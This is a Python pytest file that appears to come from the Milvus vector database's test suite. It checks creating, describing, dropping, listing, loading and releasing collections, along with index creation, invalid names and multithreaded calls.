@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
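# alternate the two index types across collections: odd indices get IVF_SQ8, even get IVF_FLAT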
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
log.info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with more than the maximum number of fields
method: create collection with a field count exceeding the maximum (64)
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_not_existed(self, connect):
"""
target: test describe_collection on a collection that was dropped
method: generate a random collection name, create the collection, drop it,
then call describe_collection again
expected: raise exception
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L1)
def test_describe_collection_multithread(self, connect):
"""
target: test describe collection with multi-threads
method: describe the same collection from multiple threads
expected: describe_collection succeeds in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_not_existed(self, connect):
"""
target: test dropping a collection that was never created
method: generate a random collection name that does not exist in the db,
assert the exception raised by the drop_collection method
expected: raise exception
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L1)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multi-thread
method: create and drop collection using multi-thread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test drop collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test drop invalid collection
method: drop collection with empty or None collection name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_existed(self, connect):
"""
target: test has_collection on a collection that was dropped
method: generate a random collection name, create the collection, then drop it,
assert the value returned by the has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test has collection with multi-threads
method: call has_collection on the same collection from multiple threads
expected: has_collection returns True in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test has_collection with an invalid collection name
method: call has_collection with an invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test has_collection with an empty collection name
method: call has_collection with an empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test has_collection with None as the collection name
method: call has_collection with None as the collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multi-threads
method: list collection using multi-threads
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L1)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
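# the structure metrics are not supported by BIN_IVF_FLAT, so index creation is expected to raise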
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_empty_collection(self, connect, collection):
"""
target: test load an empty collection with no data inserted
method: no entities in collection, load and release the collection
expected: load and release successfully
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load and release a non-existent collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: No exception and data can be queried
"""
result = connect.insert(collection, gen_entities(100))
assert len(result.primary_keys) == 100
connect.load_collection(collection)
int_field_name = "int64"
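# query the first inserted primary key to confirm the unflushed data is queryable after load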
term_expr = f'{int_field_name} in {result.primary_keys[:1]}'
res = connect.query(collection, term_expr)
assert res == [{int_field_name: result.primary_keys[0]}]
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: to be determined
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/13118")
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, **default_single_query, partition_names=[default_tag])
res = connect.search(collection, **default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/13118")
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into a partition, load the partition, release the collection, then search
expected: search raises exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
params, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, **params, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during dropping index
method: insert, create index and flush, load collection, then release the collection while dropping the index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
